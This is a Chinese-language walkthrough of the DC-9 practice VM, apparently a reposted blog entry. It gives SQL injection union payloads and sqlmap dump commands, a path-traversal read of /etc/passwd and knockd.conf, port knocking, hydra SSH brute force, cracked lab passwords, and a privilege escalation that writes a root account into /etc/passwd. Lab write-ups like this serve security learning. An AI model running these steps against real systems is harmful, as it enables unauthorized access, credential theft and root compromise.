DC-9靶機


僅供個人娛樂

靶機信息

下載地址:http://www.five86.com/downloads/DC-9.zip

一、主機掃描

二、信息收集

三、漏洞查找和利用

發現search的地方可能有sql注入

1' union select 1,2,3,4,5,6#

-1' union select 1,2,3,4,5,database()--+


#

-1'union select 1,2,3,4,5,group_concat(table_name) from information_schema.tables where table_schema = database()#

-1' union select 1,2,3,4,5,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='Users'#

-1' union select 1,2,3,4,5,group_concat(UserID,Username,Password)from Users#

使用sqlmap

sqlmap -r 1.txt --dbs

sqlmap -r 1.txt -D users --tables

sqlmap -r 1.txt -D users -T UserDetails --columns

sqlmap -r 1 .txt -D users -T UserDetails --dump

sqlmap -r 1.txt -D Staff--tables

sqlmap -r 1.txt -D Staff -T Users --columns

sqlmap -r 1.txt -D Staff -T Users -C Password,UserID,Username –-dump

transorbital1

http://192.168.17.136/manage.php?file=../../../../etc/passwd

沒有爆破到

信息收集 發現ssh端口為filtered  百度

這個knockd.conf是一種端口試探服務器工具。它偵聽以太網或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客戶軟件通過向服務器上的端口發送TCP或數據包來啟動端口命中,也可以直接用nc敲擊端口。

http://192.168.17.136/manage.php?file=../../../../etc/knockd.conf

查看該文件,我們需要依次敲擊 7469 8475 9842 端口實現敲門操作

nc 192.169.17.136 7469

nc 192.169.17.136 8475

nc 192.169.17.136 9842

或者

nmap -p 7469 192.168.17.136

nmap -p 8475 192.168.17.136

nmap -p 9842 192.168.17.136

nmap -p22 192.168.17.136

hydra -L 1.txt -P 2.txt ssh://192.168.17.136

得到密碼

login: chandlerb password: UrAG0D!

login: janitor  password: Ilovepeepee

login: joeyt  password: Passw0rd

login: fredf  password: B4-Tru3-001

登錄信息收集

使用find命令找到該文件,查看源代碼

find / -name"test.py"2>/dev/null

cat /opt/devstuff/test.py

百度創個賬戶

openssl passwd -1 -salt au 123456

echo'au:$1$au$yiTIEVOOBr5S6eBjHZluV/:0:0:root:/bin/bash'>> /tmp/au
sudo ./test/tmp/au /etc/passwd

然后運行test腳本,切換到au用戶,成功得到root權限

su au

123456




免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM